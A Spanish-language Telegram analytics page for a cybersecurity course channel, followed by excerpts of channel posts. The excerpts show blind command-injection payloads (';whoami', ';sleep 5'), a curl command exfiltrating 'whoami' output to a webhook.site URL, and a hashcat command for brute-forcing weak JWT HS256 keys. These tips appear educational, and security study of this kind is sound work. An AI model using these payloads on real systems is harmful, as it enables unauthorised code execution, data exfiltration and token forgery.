¡Ya disponible! Investigación de Telegram 2025 — los principales insights del año 
All Security Engineering Courses
This channel is being updated often with older than 2020 courses, ebooks, videos, code, etc. to be used responsibly by everyone in CyberSecurity in an ethical manner. Lots of content is being downloaded from other channels or forwarded here. Bookmark me!
Mostrar más📈 Análisis del canal de Telegram All Security Engineering Courses
El canal All Security Engineering Courses (@allsecurityengineeringcourses) en el segmento lingüístico de Inglés es un actor destacado. Actualmente la comunidad reúne a 18 784 suscriptores, ocupando la posición 7 169 en la categoría Tecnologías y Aplicaciones y el puesto 36 005 en la región Rusia.
📊 Métricas de audiencia y dinámica
Desde su creación el невідомо, el proyecto ha mostrado un crecimiento acelerado, reuniendo a 18 784 suscriptores.
Según los últimos datos del 12 junio, 2026, el canal mantiene una actividad estable. En los últimos 30 días la variación de miembros fue de 118, y en las últimas 24 horas de -1, conservando un alto alcance.
- Estado de verificación: No verificado
- Tasa de interacción (ER): El promedio de interacción de la audiencia es 10.04%. Durante las primeras 24 horas tras publicar, el contenido suele obtener 3.09% de reacciones respecto al total de suscriptores.
- Alcance de las publicaciones: Cada publicación recibe en promedio 1 886 visualizaciones. En el primer día suele acumular 580 visualizaciones.
- Reacciones e interacción: La audiencia responde de forma activa: el promedio de reacciones por publicación es 2.
- Intereses temáticos: El contenido se centra en temas clave como git, strace, github, linux, docker.
📝 Descripción y política de contenido
El autor describe el recurso como un espacio para expresar opiniones subjetivas:
“This channel is being updated often with older than 2020 courses, ebooks, videos, code, etc. to be used responsibly by everyone in CyberSecurity in an ethical manner. Lots of content is being downloaded from other channels or forwarded here. Bookmar...”
Gracias a la alta frecuencia de actualizaciones (últimos datos recibidos el 13 junio, 2026), el canal mantiene la vigencia y un amplio alcance. La analítica demuestra que la audiencia interactúa activamente con el contenido, lo que lo convierte en un punto de referencia dentro de la categoría Tecnologías y Aplicaciones.
;whoami
Since the app doesn’t return output (blind RCE), you need a side-channel to confirm it.
• Step 2: Use a Time-Based Payload like ;sleep 5
If the server delays its response by ~5 seconds, it confirms your command executed.
💡This proves RCE is real, even if output is hidden.
• Step 3: Exfiltrate Output Using Webhook.site using a payload like this:
curl -X POST -d "user=$(whoami)" https://webhook.site/YOUR-IDWebhook.site
Visit your unique Webhook.site URL and you’ll see a new request with the POST body: user=www-data
💡That confirms command output was exfiltrated successfully.When apps use HS256, the same key signs and verifies the token. If that key is weak (e.g., secret, 123456, app name…), it can be brute-forced offline.• Attack flow: 1. Capture a valid JWT 2. Use tools like hashcat or jwt-tool to brute-force the key
hashcat -a 0 -m 16500 <jwt> <wordlist>